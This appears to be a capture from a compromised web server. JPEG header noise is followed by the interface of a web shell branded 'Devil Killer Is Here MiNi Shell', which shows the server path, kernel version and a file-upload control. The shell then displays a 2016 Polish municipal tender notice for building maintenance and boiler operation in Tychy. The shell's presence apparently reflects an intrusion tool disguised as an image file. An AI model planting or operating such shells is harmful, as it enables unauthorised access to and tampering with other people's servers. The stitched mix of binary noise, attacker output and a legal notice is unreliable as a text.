JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160325/69164-N-2016.html

<p class="kh_header"><b>Tychy: Świadczenie usług w zakresie bieżącej konserwacji i czynności całodobowego 
     pogotowia technicznego oraz wykonywania napraw i robót budowlanych w obrębie 
     zasobów gminy administrowanych przez Miejski Zarząd Budynków Mieszkalnych 
     w Tychach wraz z utrzymaniem całodobowego ruchu cieplnego w kotłowniach.</b><br>
<b>Numer ogłoszenia: 69164 - 2016; data zamieszczenia: 25.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie bieżącej konserwacji i czynności całodobowego 
     pogotowia technicznego oraz wykonywania napraw i robót budowlanych w obrębie 
     zasobów gminy administrowanych przez Miejski Zarząd Budynków Mieszkalnych 
     w Tychach wraz z utrzymaniem całodobowego ruchu cieplnego w kotłowniach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie bieżącej konserwacji i czynności 
     całodobowego pogotowia technicznego, wykonywania napraw i robót budowlanych 
     wraz z utrzymaniem całodobowego ruchu cieplnego w kotłowniach węglowych i gazowych 
    w obrębie zasobów gminy, którymi w imieniu Zamawiającego administruje Miejski Zarząd 
    Budynków Mieszkalnych w Tychach, poprzez swoje jednostki organizacyjne zwane dalej: 
     -   ROM Nr I   z siedzibą w Tychach przy ul. Arkadowej 9c 
     -   ROM Nr II  z siedzibą w Tychach przy ul. Budowlanych 41
     -   ROM Nr III z siedzibą w Tychach przy ul. Cyganerii 43
     -   ROM Nr IV z siedzibą w Tychach przy al. Niepodległości 76 
     -   ROM Nr V  z siedzibą w Tychach przy ul. Budowlanych 41 
     oraz Dział Techniczno-Eksploatacyjny z siedzibą w Tychach przy ul. Filaretów 31.

2.	Szczegółowy opis przedmiotu zamówienia i warunki realizacji usług w zakresie bieżącej 
   konserwacji i czynności całodobowego pogotowia technicznego oraz wykonywania napraw 
   i robót budowlanych w obrębie zasobów gminy administrowanych przez Miejski Zarząd 
   Budynków Mieszkalnych w Tychach zawiera załącznik nr 1 do SIWZ.

3.	Szczegółowy opis przedmiotu zamówienia i warunki realizacji usług w zakresie w zakresie 
     utrzymania całodobowego ruchu cieplnego w kotłowniach węglowych i gazowych w obrębie 
     zasobów gminy administrowanych przez Miejski Zarząd Budynków Mieszkalnych w Tychach 
     wraz z wykazem kotłowni węglowych i gazowych zawiera załącznik nr 1a do SIWZ 

5.  Wykaz nieruchomości gminy administrowanych przez poszczególne komórki organizacyjne 
     MZBM objętych świadczeniem usług w zakresie bieżącej konserwacji i czynności całodobowego 
     pogotowia technicznego oraz wykonywania napraw i robót budowlanych zawiera 
     załącznik nr 2A do umowy.

6.  Wykaz nieruchomości gminy administrowanych przez poszczególne komórki organizacyjne 
      MZBM objętych wykonywaniem napraw i robót budowlanych zawiera  załącznik nr 2B do  
      umowy.

 7.  Wykaz nieruchomości gminy administrowanych przez poszczególne komórki organizacyjne 
      MZBM do przeprowadzenia okresowych badań i pomiarów ochronnych instalacji elektrycznej 
      i odgromowej zawiera załącznik nr 2c do umowy.
          
    
8.  Wykonawca we własnym zakresie zorganizuje dwa całodobowe punkty pogotowia technicznego: 
     - jeden punkt na terenie administrowanym przez  ROM Nr I  , drugi terenie administrowanym 
     przez ROM Nr V  oraz zainstaluje w nich telefony stacjonarne.  Adresy punktów pogotowia 
     technicznego i numery telefonów zostaną udostępnione   
     użytkownikom nieruchomości. 
Termin realizacji zamówienia: 
 12 miesięcy -  Świadczenie usług w zakresie bieżącej konserwacji i czynności całodobowego 
                               pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
                               w obrębie zasobów gminy administrowanych przez MZBM;
         6,5 miesiąca -  Utrzymanie całodobowego ruchu cieplnego w kotłowniach węglowych 
                               i gazowych w obrębie zasobów gminy administrowanych przez MZBM..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
        ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na 
        zasadach określonych w art. 67 ust.1 pkt 6) ustawy - PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2, 50.72.10.00-5, 45.00.00.00-7, 45.30.00.00-0, 45.26.19.00-3, 45.26.13.20-3, 45.26.25.22-4, 45.44.00.00-3, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:                              
18 000,00 zł (słownie: osiemnaście tysięcy pięćset złotych zero groszy) - na czas związania ofertą. 
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
                                 Bank Pekao S.A.
                                 Nr rachunku bankowego: 86 1240 2975 1111 0010 6583 2252
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia  wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu 
dokonywania spełniania warunku udziału w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący posiadania wiedzy 
         i doświadczenia (art. 22 ust.1 pkt 2) ustawy PZP), Zamawiający wymaga złożenia            
         następujących dokumentów:
   1)   wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
       wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz 
       z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi 
       zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane 
       należycie. 
         Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał 
      a)  co najmniej 2 usługi  zrealizowane (w ramach dwóch odrębnych umów przez okres 
           12 miesięcy każda) w zamieszkałych budynkach wielorodzinnych obejmujące swym 
            zakresem bieżącą konserwację ze świadczeniem czynności całodobowego pogotowia 
            technicznego o wartości   min. 35 000,00 zł (brutto)/12 miesięcy - każda z usług

      b)  co najmniej 2 usługi  zrealizowane (w ramach dwóch odrębnych umów przez okres 
          12 miesięcy każda) w funkcjonujących budynkach użyteczności publicznej* obejmujące swym 
           zakresem bieżącą konserwację ze świadczeniem czynności całodobowego pogotowia 
           technicznego o wartości min. 140 000,00 zł (brutto)/12 miesięcy - każda z usług
       
          Usługa musi dotyczyć całego budynku, a nie pojedynczych instalacji lub wybranych części 
          nieruchomości.
                 *budynek użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na potrzeby 
                administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty , szkolnictwa wyższego, 
                         nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, 
                         w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie 
                         kolejowym, drogowym, lotniczym, morskim  lub wodnym śródlądowym, oraz inny budynek przeznaczony do 
                        wykonywania podobnych funkcji.     

c)	co najmniej 2 usługi zrealizowane (w ramach dwóch odrębnych umów) obejmujące 
    swym zakresem utrzymanie całodobowego ruchu cieplnego w kotłowniach węglowych
    i gazowych o wartości nie mniejszej niż 20 000,00 zł  (brutto) - każda z usług 

        Wykaz usług należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.


    2)   wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem  
        terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
       wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz dołączeniem dowodów 
       dotyczących najważniejszych robót, określających , czy roboty te zostały wykonane w sposób 
       należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej            
       i prawidłowo ukończone.
         Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że wykonał 
       co najmniej 2 roboty budowlano- instalacyjne w zamieszkałych budynkach
       wielorodzinnych (w ramach dwóch odrębnych umów), o wartości min. 100 000,00 zł 
       (brutto) - każda z robót 


      Wykaz robót należy sporządzić wg wzoru druku stanowiącego załącznik nr 5 do SIWZ.

(W przypadku podmiotów występujących wspólnie niniejsze warunki udziału podmioty mogą spełniać łącznie lub co najmniej jeden podmiot).


Do wykazów należy dołączyć dowody dotyczące najważniejszych usług i robót 
             budowlanych określające, czy usługi te zostały wykonane w sposób należyty oraz czy 
             roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania 
       odpowiednim potencjałem technicznym do wykonania zamówienia (art. 22 ust. 1 pkt 3 
       ustawy - PZP) Zamawiający wymaga złożenia następujących dokumentów:
        -  wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych 
       Wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie
       dysponowania tymi zasobami.
       Wymagane jest dysponowanie następującymi narzędziami, wyposażeniem 
       i urządzeniami, tj.:   co najmniej trzema urządzeniami pomiarowymi do zdalnego odczytu 
       wskazań  jednostrumieniowych wodomierzy  Brunata Sensus Residia , na których 
       zamontowane są elektroniczne nadajniki radiowe Brunata Click On Water  z możliwością 
       przekazywania danych do systemu rozliczeń Zamawiającego.
 Wykaz narzędzi i urządzeń należy sporządzić wg wzoru druku stanowiącego załącznik nr 6 
 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania
        osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
        Zamawiający żąda następujących dokumentów:
   1)  Wykaz osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
         odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
        budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
        i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
        przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
         Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
        w szczególności:
a)	co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
	w  specjalności konstrukcyjno - budowlanej, z co najmniej 5 letnim doświadczeniem; 

   b)   co najmniej dwiema osobami posiadającymi uprawnienia do wykonywania pracy 
        na stanowisku dozoru w zakresie obsługi , konserwacji, remontów , montażu 
        kontrolno- pomiarowym dla urządzeń, instalacji i sieci gazowych, z co najmniej 5 letnim 
         doświadczeniem;

  c)    co najmniej dwiema osobami posiadającymi uprawnienia do wykonywania pracy na 
        stanowisku  eksploatacji w zakresie obsługi, konserwacji, remontów, montażu kontrolno- 
        pomiarowym dla urządzeń, instalacji i sieci gazowych, z co najmniej 5 letnim doświadczeniem;


   d)   co najmniej dwiema osobami posiadającymi uprawnienia do zajmowania się eksploatacją
         urządzeń, instalacji i sieci elektroenergetycznych do 1KV na stanowisku dozoru , z co 
         najmniej 5 letnim doświadczeniem;

e)   co najmniej dwiema osobami, posiadającymi uprawnienia do wykonania pracy na stanowisku 
         eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu do 1 kV , z co najmniej 
         5 letnim doświadczeniem;


f)   co najmniej dwiema osobami posiadającymi uprawnienia do wykonywania pomiarów ochron
         przeciwporażeniowych i instalacji odgromowych, z co najmniej 5 letnim doświadczeniem;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  Wykonawca spełnia warunek udziału dotyczący posiadania 
       wymaganej sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt  4) ustawy PZP), 
       Zamawiający wymaga, złożenia następujących dokumentów: 
1)	opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że 
      Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności związanej z przedmiotem zamówienia.
       Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ww. 
       dokument o wartości ubezpieczenia nie mniejszej niż  600 000,00 zł (sześćset  tysięcy złotych 
       zero groszy).
       Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia musi 
       wynikać z treści dokumentu polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 2 do SIWZ;
2)	wypełniony i podpisany formularz oferty cenowej - sporządzony według wzoru druku stanowiącego załącznik nr 2a do SIWZ;
3)	stosowne pełnomocnictwo (a) do działania w imieniu Wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu 
z właściwego rejestru;
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego;
5) Zgodnie z art. 26 ust. 2b ustawy - PZP, Wykonawca może polegać na wiedzy 
         i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, 
         zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od    
         charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  
         zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami 
         w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 
         zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów 
         na potrzeby wykonania zamówienia.  Dokument, z którego będzie wynikać zobowiązanie 
         podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia 
         Wykonawcy ubiegającego się o zamówienie odpowiedniego zasobu oraz wskazywać:
       -   jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
       -   w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę przy 
            wykonywaniu zamówienia,
       -   jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem,
